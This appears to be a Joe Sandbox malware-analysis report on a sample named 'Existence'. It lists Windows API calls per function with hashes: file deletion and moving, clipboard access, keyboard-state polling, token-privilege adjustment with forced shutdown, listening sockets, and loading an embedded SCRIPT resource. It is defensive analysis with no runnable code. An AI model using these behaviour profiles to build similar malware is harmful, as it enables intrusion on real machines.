                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                                          • Opcode ID: 539dd7ae4a8e8916b475031f3daf76b7a360c07cf1e55978e99435f7cafcdb28
                                                                                                                                                                                          • Instruction ID: 907cb1e5384d857b7263738f62c2e9b9bb169f8500ab53babe9d8e03c6a08da0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 539dd7ae4a8e8916b475031f3daf76b7a360c07cf1e55978e99435f7cafcdb28
                                                                                                                                                                                          • Instruction Fuzzy Hash: D241C6645067C97DFF3196A4A8057A5BEB0AB21348F08805DD5C65A2C2EBAC9DC8C7E3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007355D1,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00735871
                                                                                                                                                                                            • Part of subcall function 0079EAB0: GetFileAttributesW.KERNEL32(?,0079D840), ref: 0079EAB1
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0079D9CD
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0079DA88
                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0079DA9B
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0079DAB8
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0079DAE2
                                                                                                                                                                                            • Part of subcall function 0079DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0079DAC7,?,?), ref: 0079DB5D
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0079DAFE
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0079DB0F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                          • API String ID: 1946585618-1173974218
                                                                                                                                                                                          • Opcode ID: 10259a04583da4197bb7606b63d75117ae48431a4aec28fdc9d4492486f6c63f
                                                                                                                                                                                          • Instruction ID: 884b807508b1eff2a426900f65cdb2996de5c980d65154dfeee46e84dac8d11f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10259a04583da4197bb7606b63d75117ae48431a4aec28fdc9d4492486f6c63f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32615D7190510DEEDF25EBA4E996DEDB7B5EF14300F2080A9E40277192EB396F09CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1737998785-0
                                                                                                                                                                                          • Opcode ID: b1536d7c1648b74eb95fd1cd0bd57ce864c5b20c481e8589a01ae35fecd8a500
                                                                                                                                                                                          • Instruction ID: b912d6577a626b656f5636ee4ec2cdb0e4c59275200d64375faba5d5b269db40
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1536d7c1648b74eb95fd1cd0bd57ce864c5b20c481e8589a01ae35fecd8a500
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E417931604601EFE320CF55D888F16BBA0BF85358F14C1ADE85A8B662CB3DEC42CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00792010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079205A
                                                                                                                                                                                            • Part of subcall function 00792010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00792087
                                                                                                                                                                                            • Part of subcall function 00792010: GetLastError.KERNEL32 ref: 00792097
                                                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0079F249
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                          • API String ID: 2234035333-3163812486
                                                                                                                                                                                          • Opcode ID: e9ae1e2bf58ded15504296469348032aa0a70fbe0c7ed2090d58f1c969183fbf
                                                                                                                                                                                          • Instruction ID: d24dadaea942f9e3d5380b3a3b8fef5e9aee0b031a031ed0a2a0ed4a392972e0
                                                                                                                                                                                          • Opcode Fuzzy Hash: e9ae1e2bf58ded15504296469348032aa0a70fbe0c7ed2090d58f1c969183fbf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F01F97A6102146BEF2463BCBC8AFBF736CBB08354F154535FD12E21D2E56C5D009190
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007B1CD3
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B1CE0
                                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 007B1D17
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B1D22
                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 007B1D51
                                                                                                                                                                                          • listen.WSOCK32(00000000,00000005), ref: 007B1D60
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B1D6A
                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 007B1D99
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 540024437-0
                                                                                                                                                                                          • Opcode ID: ebb91e97ed64642f80badddf5843a7b3894c519c84466c1f5692240a9c936976
                                                                                                                                                                                          • Instruction ID: 79f53323cb93a4abbf850866336b963cfa8fffa825294e7ad755a8e8ed6a5d48
                                                                                                                                                                                          • Opcode Fuzzy Hash: ebb91e97ed64642f80badddf5843a7b3894c519c84466c1f5692240a9c936976
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89416E716001009FD720DF28C599B66BBF5AF45318F98C19CE8569F292C779EC81CBE1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 0076BD54
                                                                                                                                                                                          • _free.LIBCMT ref: 0076BD78
                                                                                                                                                                                          • _free.LIBCMT ref: 0076BEFF
                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007D46D0), ref: 0076BF11
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0080221C,000000FF,00000000,0000003F,00000000,?,?), ref: 0076BF89
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00802270,000000FF,?,0000003F,00000000,?), ref: 0076BFB6
                                                                                                                                                                                          • _free.LIBCMT ref: 0076C0CB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 314583886-0
                                                                                                                                                                                          • Opcode ID: 278adff35f94e9ab376647b1ea3dddc5ccdeafc35f8044cffa2ceb82959d60cc
                                                                                                                                                                                          • Instruction ID: 94bbf3b01e48e1e6e53e4560f50c622b5669df05a85afe14274a56fbdae76246
                                                                                                                                                                                          • Opcode Fuzzy Hash: 278adff35f94e9ab376647b1ea3dddc5ccdeafc35f8044cffa2ceb82959d60cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FC12A71A00204DFDB209F78CC45AEABBB9EF47310F14419AED96DB252E7799E81CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007756C2,?,?,00000000,00000000), ref: 007A3A1E
                                                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007756C2,?,?,00000000,00000000), ref: 007A3A35
                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,007756C2,?,?,00000000,00000000,?,?,?,?,?,?,007366CE), ref: 007A3A45
                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,007756C2,?,?,00000000,00000000,?,?,?,?,?,?,007366CE), ref: 007A3A56
                                                                                                                                                                                          • LockResource.KERNEL32(007756C2,?,?,007756C2,?,?,00000000,00000000,?,?,?,?,?,?,007366CE,?), ref: 007A3A65
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                                          • Opcode ID: 2fd65f0863e7ab18203374d5d25191c38943652d7d99a8bd1d544a32a0fcce62
                                                                                                                                                                                          • Instruction ID: 6becf13621fd97f6c545839b07778276e00674264703109b4289f382829f9b56
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd65f0863e7ab18203374d5d25191c38943652d7d99a8bd1d544a32a0fcce62
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0113971200715BFE7318F65DC48F277BBDEBC6B51F14826CB542962A0DBB5ED018A20
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00791900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00791916
                                                                                                                                                                                            • Part of subcall function 00791900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00791922
                                                                                                                                                                                            • Part of subcall function 00791900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00791931
                                                                                                                                                                                            • Part of subcall function 00791900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00791938
                                                                                                                                                                                            • Part of subcall function 00791900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079194E
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00791C81), ref: 007920FB
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00792107
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0079210E
                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00792127
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00791C81), ref: 0079213B
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00792142
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3008561057-0
                                                                                                                                                                                          • Opcode ID: 3a0fcb58dd3a620fa948684cc63f6d8ae95bf70164098d769d2132acc508fa8d
                                                                                                                                                                                          • Instruction ID: f0c9100d86bd2cf623ca1aff22d94010c34bd1edc8981c79350eff1d49fb20dd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a0fcb58dd3a620fa948684cc63f6d8ae95bf70164098d769d2132acc508fa8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0411DC72540209FFDF20AB64EC09FAE7BB9EF40355F15802CE94193121D339AD42CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 007AA5BD
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007AA6D0
                                                                                                                                                                                            • Part of subcall function 007A42B9: GetInputState.USER32 ref: 007A4310
                                                                                                                                                                                            • Part of subcall function 007A42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A43AB
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007AA5ED
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007AA6BA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                          • API String ID: 1972594611-438819550
                                                                                                                                                                                          • Opcode ID: 94f467aa35725537ea848ebab5329a7ad95e56eddcc6853639515da2104865a1
                                                                                                                                                                                          • Instruction ID: ec3631644bdf0f4e9b5a1a442f1b4ed94ee87bdfe11a7c0c6f9a1a7af7e0a2fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94f467aa35725537ea848ebab5329a7ad95e56eddcc6853639515da2104865a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1841837194020AEFDF14DFA4C849EEEBBB4FF46310F248159E805A2191EB789E54CF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefDlgProcW.USER32(?,?), ref: 0073233E
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00732421
                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00732434
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$Proc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 929743424-0
                                                                                                                                                                                          • Opcode ID: 707590033c235973d419380ca6e6ff6b23240eca3a97097c318de3b72fa12d1b
                                                                                                                                                                                          • Instruction ID: b63ede6c46b6a93afadd7f509a304b3f6b85aee1de1cfc1a8d23a552ee76c1ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 707590033c235973d419380ca6e6ff6b23240eca3a97097c318de3b72fa12d1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 838118F1108454BEFA2D6A3C8C9CE7F265EEB42340F15811DF202D6597CA6E9F43A276
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007B3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007B3AD7
                                                                                                                                                                                            • Part of subcall function 007B3AAB: _wcslen.LIBCMT ref: 007B3AF8
                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007B22BA
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B22E1
                                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 007B2338
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B2343
                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 007B2372
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1601658205-0
                                                                                                                                                                                          • Opcode ID: 6f2c9ee4085795f01f6041f7429b88ecece283d9f30ef1af00435eb566f3a2d7
                                                                                                                                                                                          • Instruction ID: 54b1712388ea2d9158c3882d8e023e5337b9e64795fd1c9dfc83402b587f7fa3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2c9ee4085795f01f6041f7429b88ecece283d9f30ef1af00435eb566f3a2d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: A051B3B1A00200EFE720AF24C88AF6A77E5AB44754F54849CF9459F3D3D779AD42CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 292994002-0
                                                                                                                                                                                          • Opcode ID: e4fca198791d40e4edeb493ad18bfbdbdca81dd28b9ddf2b289d12f76d3eb080
                                                                                                                                                                                          • Instruction ID: 7e4859a7684a1806eaf78f23d8b6d0e448c49fc56d3455c62540aacff148aaa4
                                                                                                                                                                                          • Opcode Fuzzy Hash: e4fca198791d40e4edeb493ad18bfbdbdca81dd28b9ddf2b289d12f76d3eb080
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221E235700210CFE7219F26C888F5A7BA5EF85324F18806CE94A8B253DB79ED43CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
